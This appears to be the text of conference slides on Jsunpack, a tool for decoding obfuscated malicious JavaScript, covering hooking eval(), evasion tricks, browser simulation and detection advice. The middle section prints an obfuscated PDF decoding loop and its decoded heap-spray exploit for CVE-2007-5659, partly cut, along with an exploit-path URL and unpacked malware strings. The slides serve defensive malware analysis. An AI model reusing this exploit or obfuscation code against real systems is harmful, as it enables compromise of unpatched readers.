+ Problem statement 

+ Prior research and solutions 

+ Jsunpack design and purpose 

+ Jsunpack advantages and disadvantages 

+ Future of understanding threats 

+ Recommendations to research, prevent, and detect threats 
+ Large volume of malicious JavaScript files 

■ Time and sacrificial research machines 

■ Large scale (SQL injection tools) 

+ Encoded/encrypted JavaScript exploits 

■ eval(), document.write(), document.writeln(), document.createElement(), setTimeout(), appendChild() 

■ Intrusion Detection Systems 

■ Automatic attacks (JavaScript code generation) 

+ Web-based exploit kits are rapidly evolving and diverse 

■ Commercial Sales 

+ Detection of researchers 
+ Historical threats database 



Prior research and solutions - Manual 



+ Manual decoding 

■ Modify code, open within browser, repeat 

- Textarea 

- Scripting.FileSystemObject 

- Replacing code 

■ Decoding 

■ Debuggers (Microsoft Script Debugger or Firefox JavaScript debuggers) 



+ Techniques to defeat manual decoding 

■ Escape sequences 

■ arguments.callee 

■ Environment variables, cookies 

■ Version detection 

■ Timing / blacklisting 

+ JavaScript hooking: replace eval() with a wrapper that prints its argument before running it (SpiderMonkey shell print()) 

var my_eval = this.eval;                 // keep the engine's eval 
this.eval = function (str) { print(str); return my_eval(str); };   // log, then run (and return the result, so eval("eval")-style tricks still work) 

+ David Zimmer / jsDecode - faster, not safer 

■ http://labs.idefense.com/software/malcode.php#more_malcode+analysis 



+ Techniques to defeat JavaScript hooking 

■ Call eval() inside a function with a string that refers to a local variable. A hook that re-runs the string through the saved eval does so as an indirect eval, in global scope, where abc does not exist, so the real payload is never reached: 

function fund(){ 
    var abc = new Array; 
    eval('print(abc);'); 
} 
fund(); 
+ SpiderMonkey source code 

■ Modify to output information 

■ http://blog.didierstevens.com/programs/spidermonkey/ 

■ smjs -f file1.js -f file2.js 

+ Stephan Chenette / "The Ultimate Deobfuscator" (Websense / ToorconX) 

■ http://securitylabs.websense.com/content/Blogs/3198.aspx 
+ Malzilla - by bobby; has nice built-in features and decoding plug-ins 

■ http://malzilla.sourceforge.net/ 

■ HTML processing, decoding tools, shellcode emulation 

(Figure: Malzilla by bobby) 
+ Safe, not requiring infected machine 

+ Archive content 

+ Simulate browser environment 

+ Process ActiveX, PDF, Flash 

+ Combine best hooking techniques and evaluate multiple paths 

+ Enable analysis despite IP address blocking and filtering 

+ Integrate with IDS, crawling, other research 

+ Goals - 

■ Automatic 

■ NO base64, NO UCS*, NO dec, NO RSA decryption 
+ 511 lines - Python 

■ Acts like a browser: downloads files, parses HTML, PDF, and SWF files 

■ Finds JavaScript and follows scripts and iframes 

■ Automatically handles getElementById(), innerHTML, innerText, createElement() and various ActiveX functions. 

+ 116 lines - JavaScript 

■ Environment variables 

■ Hooking functions 

■ Simulate ActiveX 

+ 1 to 5 lines - C 

■ Extract vital information 
Libraries/dependencies 
+ Decoding loop PDF: 

var p = "1e234v56a7l8"; 
p = p.replace(/[\+123456789]/g, "");     // strips the digits, leaving "eval" 
var Prototype = eval(p);                 // eval("eval") hands back the eval function itself 

var s = "32.102<more numbers>32".replace(/[A-Za-z]/g, function (c){ 
    // ROT13 any letters hidden among the numbers 
    return String.fromCharCode((((c = c.charCodeAt(0)) & 223) - 52) % 26 + (c & 32) + 65); 
}).split("."); 
var p = ""; 
for (var i = 0; i < s.length; i++) { p += String.fromCharCode(s[i]); }   // char codes -> second-stage script 

function uSQXcfcd2(){ Prototype(p); } 

this.uSQXcfcd2(); 
+ Becomes (PDF Exploit CVE-2007-5659): 

eval function get_spray(spray, len){ while (spray.length*2<len){spray += spray;} spray = spray.substring(0,len/2); return spray; } 
function gln(num, content){ var z = ""; for (var i = 0; i < num; i++){ z += 
<CUT> 
var overflow = unescape("%u0c0c%u0c0c"); 
while(overflow.length < 44952) overflow += overflow; 
this.collabStore = Collab.collectEmailInfo({subj: m, msg: overflow}); 
} //jsunpack.called Collab.collectEmailInfo with and 
Exploit path: http://jsunpack.jeek.org/dec/go7urNgoogle-analitycs.lijg.ru 

2) HTML JavaScript 

3) Exploit JavaScript and load PDF 

4) PDF 

5) JavaScript PDF eval 

6) JavaScript PDF Exploit 

7) Executable 
+ Find JavaScript code 

■ Decoded HTML 

- iframe, script 

- Redirects 

■ Flash Redirects 

+ Find executables, PDF, Flash, and other content 
+ Use ClamAV to statically unpack executables 

■ clamscan --leave-temps (Upack, FSG, and lots more) 

■ Look for strings: URLs, file names, registry keys 

Sections: ( PSyO«egA @ -@ -...@u@ )   (packed section names) 
File: MS-DOS executable, MZ for MS-DOS 
Packer: Upack V0.37 -> Dwing 
Strings:UNPACKED Software\microsoft\windows\currentversion\Explorer\shellexecutehooks 
Strings:UNPACKED Software\microsoft\windows\currentversion\Explorer 
Strings:UNPACKED ntoskrnl.exe 
Strings:UNPACKED b.Asp 
Strings:UNPACKED /Vkm.Asp?act=read 
Size: 21879 bytes 
MD5: 17de546a1ff8754515b09f9c3d67ee56 

+ Send executables to automatic analysis tools 

■ Secureworks Truman, ThreatExpert, Anubis, Joebox 
+ Evaluate multiple paths (automatic mechanisms under development) 

■ Alter environment - IE6 vs. IE7 

■ SpiderMonkey, cscript.exe, V8 (google/open source) 

+ Time gap, IP blocking, DoS, cookies, referer, User-Agent 

+ Automatic border cases 

■ Malformed HTML, malformed JavaScript 

+ Challenges in simulation 

■ Access to DOM Object 

+ Dangers of decoding browser/JavaScript engine exploits 
+ Jsunpack is a short-term and long-term adaptable solution 

■ Decodes most of the hidden JavaScript in the wild today 

■ Fast and easy to adapt environment 

- Hooking new functions 

■ Multi-path evaluation capabilities 

+ Live analysis using Honeyclients with "The Ultimate Deobfuscator" 

■ More costly and time-intensive, infecting machines 

■ Less ongoing maintenance 

+ Plug-in boundary problems: browser, PDF, SWF 
+ Timing issues 
+ Jsunpack - http://jsunpack.jeek.org/ 

■ Monitor exploitation of known and unknown vulnerabilities 

■ Decoded JavaScript is a good place to start 

■ Alerting rules, mailing lists, and researchers 

+ Intrusion Detection Systems 

■ Detect malicious or encoded JavaScript 

■ JavaScript preprocessor (bad, performance issues) 

■ Unified output plug-in (currently under investigation) 

+ Attackers using IP Address blocking (in-the-cloud? private?) 

+ PDF developers must allow users to permanently disable JavaScript 

+ SWF developers may also be able to limit exposure to redirects 

+ NoScript 

+ Secunia Personal Software Inspector 

■ (Less than 2 percent of PCs are fully patched) 